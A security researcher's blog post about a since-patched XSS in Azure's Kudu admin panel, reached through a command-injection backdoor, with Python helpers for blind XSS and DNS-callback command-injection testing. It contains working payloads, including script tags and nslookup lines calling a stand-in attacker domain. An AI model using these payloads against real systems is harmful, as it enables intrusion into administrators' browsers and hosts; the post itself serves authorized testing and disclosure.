[Editor's Note: Chris Dale is an amazing gentleman. He finds Cross-Site Scripting (XSS) flaws in the most interesting and wonderful places. In this article, Chris shares some insights into his methods and how he applied them in finding a zero-day XSS flaw associated with Microsoft Azure. Good reading! -Ed.]

Earlier in 2016, I found an interesting attack vector specifically targeting websites deployed through Azure web-apps on Microsoft's cloud platform. The vulnerability allows an attacker who has already compromised a site to further attack any administrator of the SaaS platform. The vulnerability has since been patched, which allows us to talk about it and the techniques involved. I'd like to share my approach and findings in the hope that they give other penetration testers tips and ideas for finding similar flaws as they work to improve the security of cloud-based systems.

When it comes to security vulnerabilities, it's especially important that we give considerable scrutiny to our cloud providers, given the serious dangers posed by techniques such as sandbox escapes and attacks against the shared infrastructure at large. Today, it is trivial for a company to label itself a "cloud" vendor; what we need to realize, however, is that for the most part, using the "cloud" simply means using someone else's server. This is much the same as it has always been with hosting providers, application service providers (ASPs), and the like. Really, what has changed?

We need to ask ourselves: what determines whether someone is a cloud vendor or not? Not much, really. Most of the responsibility lies with us, the clients, to ask the right questions about maturity, security and operations before we sign any contract with a potential cloud vendor. Luckily, several helpful tools and organizations already exist. Although they offer no protection against 0-day attacks like the one described later in this post, they give better assurance that the vendor is at least doing something right on the inside. For questionnaires that you can use to evaluate your cloud vendor, check out:



Azure is Microsoft's public cloud platform, hosting services ranging from Infrastructure-as-a-Service and Platform-as-a-Service to Software-as-a-Service and many more variants. The following illustration shows how Azure can be used to host SaaS services, such as a vendor re-selling a WordPress system to its clients. I'm using WordPress only as an example here:

The SaaS vendor uses its credentials to authenticate to the Azure management portal, and the same credentials to access the Kudu engine. Kudu offers many useful debugging tools and even lets you spawn command shells and PowerShell to help troubleshoot and deploy your SaaS setup. Keep in mind that only the SaaS vendor's (Azure management) credentials grant access to Kudu, not the WordPress administrator credentials.

The WordPress site is just your everyday web application, nothing special or fancy, just a regular site deployed in the cloud. An important concept with shared hosting providers (i.e., the cloud) is that each website should be fully segregated from the others in the same environment, for example:

Consider the danger if a mischievous site administrator could leverage their access on the SaaS platform to compromise other customers in the environment, or even the SaaS administrators themselves! An attacker would merely need to become a legitimate paying customer to launch such an attack, without having to find weaknesses in the platform or the deployments themselves. The only things your SaaS should be able to interact with are itself, the users of the site, and explicitly defined shared resources (e.g., appropriate databases).

In theory, neither the SaaS vendor nor other clients should ever be compromised when a single SaaS customer suffers a security breach. However, Azure allowed exactly such an attack. Let's check it out.

Having to trust your clients to run proper and secure code is not a comforting thought, so the segregation between the SaaS vendor and the website code is paramount. This attack shows how an attacker could hack the website and then proceed to attack the SaaS administrators themselves.

I discovered this attack while doing a penetration test for one of my customers. During testing I found a command injection flaw that allowed me to run commands on the platform. This is, of course, a highly critical finding; however, while abusing the vulnerability, I found that several of the commands I executed made the process and website hang indefinitely, effectively causing a denial of service. One of those commands was "tasklist". When running "tasklist", the webpage simply hung until the thread was killed or timed out.





The denial of service condition prompted me to investigate the backend. We used the Kudu administration panel to find out why the process was hanging, and killed it to avoid further denial of service. This is how that looks:



This is where I got the idea for stage two of the attack: attacking the Kudu administrator through the command injection. As the attacker, I control the processes displayed in the overview above. What if I could create a file that contained legitimate Javascript code in its name? Unfortunately, filenames can't contain special characters such as < and >, which that attack would need. However, opening up the properties of a process shows its entire environment, and from within our command injection we can set environment variables! By now you will probably see the potential attack avenue: unless proper filtering takes place, we might have a shot at getting some Javascript into an admin's browser! Here's a screenshot with a new environment variable set:



Very interesting! Instead of setting an empty variable, we set the value to contain legitimate Javascript, using the command injection from before and my corresponding backdoor, called cad.php:

The URL shows how I leverage my backdoor script to run the "set" command, which displays or sets environment variables, to create a new environment variable called "HACK" with the value "<script>alert(1)</script>". Furthermore, a URL-encoded ampersand (%26 equals &) chains the "tasklist" command. This sets up the attack.
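To make the encoding step concrete, here is a minimal Python sketch that builds such a request. The original URL is not reproduced in this post, so the host `victim.example` and the query parameter name `cmd` are hypothetical placeholders for the cad.php backdoor, and the sketch assumes the backdoor hands that parameter to cmd.exe unchanged. It also wraps the assignment as `set "NAME=value"` so that cmd.exe does not treat `<` and `>` as redirection operators; that quoting is an assumption of this sketch, not necessarily what the original request used.

```python
from urllib.parse import quote, unquote

# Hypothetical backdoor location; the real URL is not reproduced in this post.
BACKDOOR = "https://victim.example/cad.php"


def build_env_xss_url(var_name: str, payload: str, chained: str = "tasklist") -> str:
    """Return a backdoor URL that sets an environment variable to `payload`,
    then chains a second command with '&'."""
    # Quoting NAME=value keeps cmd.exe from parsing < and > as redirections.
    command = f'set "{var_name}={payload}" & {chained}'
    # safe="" percent-encodes every reserved character, so '&' becomes %26
    # and reaches the shell instead of splitting the query string.
    return f"{BACKDOOR}?cmd={quote(command, safe='')}"


if __name__ == "__main__":
    url = build_env_xss_url("HACK", "<script>alert(1)</script>")
    print(url)
    # What the shell receives after the web server decodes the parameter:
    print(unquote(url.split("cmd=", 1)[1]))
```

Printing the decoded parameter shows the exact command line the hypothetical backdoor would pass to the shell: the variable assignment followed by the hanging "tasklist".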

First, I set the environment variable to an XSS payload. Then I chain "tasklist" so the process hangs with that environment in place. This lures an administrator into debugging the problem, at which point they are compromised by the unauthorized Javascript executing in their browser. The following screenshot shows how a simple Javascript alert(1) payload has been executed inside the SaaS administrator's browser:

From here, an attacker would try to tailor a specific payload to target an Azure SaaS administrator. Instead of creating a simple popup with the alert function, one could include a third-party Javascript exploit kit such as BeEF, the Browser Exploitation Framework project. This framework makes it easy to demonstrate the risks of having an XSS vulnerability in our systems, and penetration testers commonly use it to show what unauthorized Javascript execution in a browser can do. Some of BeEF's amazing features are highlighted in the list below:

For further reading on BeEF, check out the project's homepage.

To discover vulnerabilities in third-party apps such as control panels, log viewers, and more, we need to think outside the box. Since we're flying blind, there's no easy way to get feedback from the application that our payload has executed. We have to consider where our data might end up, possibly even in a third-party application. This is where it gets hard, but far from impossible. Such exploits are often called blind exploitation; examples include blind XSS and blind command injection.

One idea for testing for out-of-band exploits such as these is to make your payloads reference your own system, using a different unique value in each payload. When a payload executes in an out-of-band channel, it makes a request to your server, signalling its execution.

For example, consider spraying your application with XSS payloads that reference a unique Javascript file on your own remote server. By tailing your web server's access log, you can easily see when a payload executes, cross-reference the request with the unique value you embedded in that payload, and then figure out which field you exploited that led to the callback to your web server. Such a payload could be a simple remote Javascript reference like <script src=http://hackerDomain.com/UniqueValue.js></script>. Once you see someone requesting this resource from your web server, you know immediately that your XSS payload has executed somewhere, allowing you to further escalate your attack.
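The bookkeeping for this can be sketched in a few lines of Python. `hackerDomain.com` is the post's placeholder domain; the field names, the 16-hex-character tokens, and the assumption that your web server writes Common/Combined Log Format lines are illustrative choices for this sketch, not the behaviour of any particular tool.

```python
import re
import secrets

# Placeholder callback host from the text; replace it with a server you control.
CALLBACK_HOST = "hackerDomain.com"

# Matches the request line of a Common/Combined Log Format entry, e.g.
# 198.51.100.23 - - [10/Oct/2016:13:55:36 +0000] "GET /3f2a9c0d1e4b5a67.js HTTP/1.1" 404 0
REQUEST_RE = re.compile(r'"GET /([0-9a-f]+)\.js HTTP/[0-9.]+"')


def make_payloads(fields):
    """Give every injectable field its own unique token and XSS payload.

    Returns (tokens, payloads): tokens maps token -> field,
    payloads maps field -> payload string.
    """
    tokens, payloads = {}, {}
    for field in fields:
        token = secrets.token_hex(8)  # 16 random lowercase hex characters
        tokens[token] = field
        payloads[field] = f"<script src=http://{CALLBACK_HOST}/{token}.js></script>"
    return tokens, payloads


def find_hits(log_lines, tokens):
    """Map each callback in an access log back to the field that triggered it.

    Returns a list of (field, client_ip) tuples.
    """
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and match.group(1) in tokens:
            # The first whitespace-separated column is the client address.
            hits.append((tokens[match.group(1)], line.split()[0]))
    return hits


if __name__ == "__main__":
    tokens, payloads = make_payloads(["username", "user_agent", "comment"])
    for field, payload in payloads.items():
        print(field, payload)
    # Simulate the browser of whoever viewed the "user_agent" value fetching the script.
    token = next(t for t, f in tokens.items() if f == "user_agent")
    log = [f'198.51.100.23 - - [10/Oct/2016:13:55:36 +0000] "GET /{token}.js HTTP/1.1" 404 0']
    print(find_hits(log, tokens))  # [('user_agent', '198.51.100.23')]
```

In a real test you would feed `find_hits` the lines from your server's access log, for example while tailing it, instead of the simulated entry. Note that the client IP belongs to whoever's browser ran the payload, which may well be an administrator rather than the application itself.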

For command injection you can use similar techniques. Consider spraying the application with references to a unique domain name you control. If you ever see a DNS request arriving at your nameserver that tries to look up the unique value you referenced, you know immediately that your payload has somehow caused a DNS lookup that made its way back to you, which may indicate command injection. Even better, spray the application with commands that ping your unique DNS name, e.g. uniqueValue.hackerDomain.com, or simply inject a ping to your IP address and then sniff for ICMP Echo Requests. If you see any ICMP messages coming in to this host, you know that your payload has executed, perhaps hours or days after you initially launched your attack.
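The DNS variant can be sketched the same way: give each field a unique subdomain, inject a lookup of it, and watch the queries that reach your nameserver. This Python sketch assumes the post's placeholder domain `hackerDomain.com` has been delegated to a host you control. The `nslookup` payload with a cmd.exe-style `&` separator is purely illustrative, since the right separator depends on the injection context, and the listener only logs queries; it never answers them. Parsing follows the RFC 1035 wire format for the question section.

```python
import secrets
import socket
import struct

# Placeholder domain from the text; its NS records must point at your listener.
CALLBACK_DOMAIN = "hackerDomain.com"


def make_dns_payloads(fields):
    """Return (tokens, payloads): a unique subdomain lookup per injectable field."""
    tokens, payloads = {}, {}
    for field in fields:
        token = secrets.token_hex(6)
        tokens[token] = field
        # '&' chains a second command in cmd.exe; adjust it for the target shell.
        payloads[field] = f"& nslookup {token}.{CALLBACK_DOMAIN}"
    return tokens, payloads


def parse_qname(packet: bytes) -> str:
    """Extract the queried name from a raw DNS query (RFC 1035, section 4.1)."""
    offset, labels = 12, []  # the question section starts after the 12-byte header
    while packet[offset] != 0:
        length = packet[offset]
        if length & 0xC0:
            raise ValueError("compressed name pointer in a query question")
        labels.append(packet[offset + 1 : offset + 1 + length].decode("ascii"))
        offset += 1 + length
    # Lower-case because some resolvers randomize letter case (DNS 0x20 encoding).
    return ".".join(labels).lower()


def match_token(qname: str, tokens: dict):
    """Return the field whose token is the label just left of the callback domain."""
    suffix = "." + CALLBACK_DOMAIN.lower()
    if not qname.endswith(suffix):
        return None
    return tokens.get(qname[: -len(suffix)].split(".")[-1])


def build_query(name: str, query_id: int = 0x1234) -> bytes:
    """Build a minimal A-record query, handy for testing without a live resolver."""
    header = struct.pack(">HHHHHH", query_id, 0x0100, 1, 0, 0, 0)  # RD flag, 1 question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def listen(tokens: dict, port: int = 53) -> None:
    """Log callbacks forever; binding port 53 usually requires root privileges."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        data, (src_ip, _) = sock.recvfrom(512)
        try:
            field = match_token(parse_qname(data), tokens)
        except (IndexError, ValueError, UnicodeDecodeError):
            continue  # not a well-formed query; ignore it
        if field:
            # src_ip is normally the victim's recursive resolver, not the victim host.
            print(f"callback for field {field!r} via resolver {src_ip}")
```

Running `listen(tokens)` on the delegated nameserver prints one line per lookup; because the sketch never replies, resolvers may retry, so expect duplicates. A ping to the unique hostname triggers the same lookup before any ICMP is sent, so this listener also catches the ping variant.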

In fact, the superb Burp Suite product from PortSwigger does exactly this. Its active scanner module sprays different unique values throughout the application, referencing unique subdomains of burpcollaborator.net. If your scanning activities ever result in a request referencing your unique subdomain, you know that your payload has executed. When that happens, you know you're winning!

With that, I encourage you all to get started testing your cloud vendors. There are many vendors that should be scrutinized and tested! Remember, though, always get permission first. Bug bounty programs are a good place to start getting permission: a lot of vendors today volunteer to have their sites tested for security vulnerabilities, and in many cases they also provide cash payouts for vulnerabilities that you responsibly disclose to them. A couple of such bug bounty programs are:

And when doing penetration testing, always remember to think outside the box!

Chris Dale is the Founder and Chief Hacking Officer at River Security. Chris has a background in System Development, IT-Operations and Security Management, and uses his hacker skills to demonstrate risk via Offensive Services and Incident Response.
